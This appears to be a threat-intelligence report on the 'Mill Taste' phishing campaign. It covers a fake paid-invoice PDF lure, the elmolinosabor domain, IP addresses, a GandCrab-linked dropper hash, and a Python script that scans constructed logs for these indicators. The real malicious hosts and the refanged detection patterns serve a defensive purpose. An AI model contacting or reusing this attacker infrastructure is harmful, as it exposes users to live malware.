An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a sweet potato or yam on the landing page of the website. The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice. The email carries a PDF attachment and arrives with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware, which is described below.
Phishing Campaign Cyber Observables
The phishing domain is: elmolinosabor[.]com
The phishing IP is: 146.112.61[.]107
Recent DNS History
The threat actor appears to have begun building its infrastructure on February 1, 2019, using an admin panel labeled “l5fa7189.justinstalledpanel.com” at IP 94.102.60.165. From the DNS history tracked by [redacted], it appears that the initial test runs of the malicious infrastructure took place on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.
The splash page for all three of these events shows the same ‘Welcome!’ placeholder.
According to the [redacted] tool, the IP noted above belongs to autonomous system AS202425, which is exhibiting multiple security issues, including:
- Route leaks (4)
- Hijacks (111)
- DDoS Amplifiers (326)
- Static Loops (5)
Malware Artifacts
The most recently seen malware artifact, as documented on [redacted], was the following WIN32 executable: scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9). As of August 15, 2019, 51 of 70 antivirus vendors had identified this malware as malicious, including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic” “downloader” and as a “Grandcrab.AF” Trojan.
As the node graph screenshot above shows, the executable beacons out to a site in the Seychelles and to a .zz site (marked with a question mark [?] on the node graph). Numerous “communicating” and referring nodes are also associated with the .zz node, which [redacted] identifies as Hanover Hospital. The Cyber Observables for this campaign are given below.
Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.
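A defender's first use of the observables above is to hunt for them in mail, DNS, proxy and endpoint telemetry. The script below is an added example (not CTIN's tooling) that refangs the indicators as published in this report, compiles them into word-bounded patterns, and runs them over a handful of constructed log lines; the log format, hostnames and client addresses are invented for illustration.

```python
import re

# Observables quoted from the report, kept in the defanged form it uses.
CAMPAIGN_IOCS = {
    "phish_domain": "elmolinosabor[.]com",
    "phish_ip": "146.112.61[.]107",
    "panel_ip": "94.102.60.165",
    "lure_subject": "Paid Invoice TT Copy",
    "dropper_sha256": "533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9",
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form that appears in real logs."""
    return (indicator.replace("[.]", ".")
                     .replace("hxxps://", "https://")
                     .replace("hxxp://", "http://"))


def compile_ioc_patterns(iocs: dict) -> dict:
    """Case-insensitive regexes bounded by non-word characters, so a subdomain
    such as mail.elmolinosabor.com still matches while 1146.112.61.107 does not."""
    return {name: re.compile(r"(?<!\w)" + re.escape(refang(value)) + r"(?!\w)", re.IGNORECASE)
            for name, value in iocs.items()}


def scan_logs(lines, patterns: dict):
    """Return (line_index, ioc_name) for every indicator hit, in log order."""
    hits = []
    for idx, line in enumerate(lines):
        for name, pattern in patterns.items():
            if pattern.search(line):
                hits.append((idx, name))
    return hits


# Constructed sample telemetry: one lure delivery, the click-through, the dropper, and one benign line.
SAMPLE_LOGS = [
    '2019-08-15T09:12:03Z mta inbound from="Melissa Henry <accounts@sender.example>" subject="Paid Invoice TT Copy" attach=invoice.pdf',
    '2019-08-15T09:12:41Z dns query client=10.1.4.22 qname=elmolinosabor.com rcode=NOERROR',
    '2019-08-15T09:12:42Z proxy client=10.1.4.22 dst=146.112.61.107:443 sni=elmolinosabor.com action=allow',
    '2019-08-15T09:15:10Z edr host=WS-0417 process=scaalqtw.exe sha256=533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9',
    '2019-08-15T09:15:12Z proxy client=10.1.4.22 dst=94.102.60.165:80 url=/sun/check.dll action=block',
    '2019-08-15T09:20:00Z proxy client=10.1.4.9 dst=203.0.113.7:443 sni=benign.example action=allow',
]

if __name__ == "__main__":
    for idx, name in scan_logs(SAMPLE_LOGS, compile_ioc_patterns(CAMPAIGN_IOCS)):
        print(f"line {idx}: matched {name} -> {SAMPLE_LOGS[idx]}")
```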
Dropper Site Cyber Observables
Communicating Nodes Cyber Observables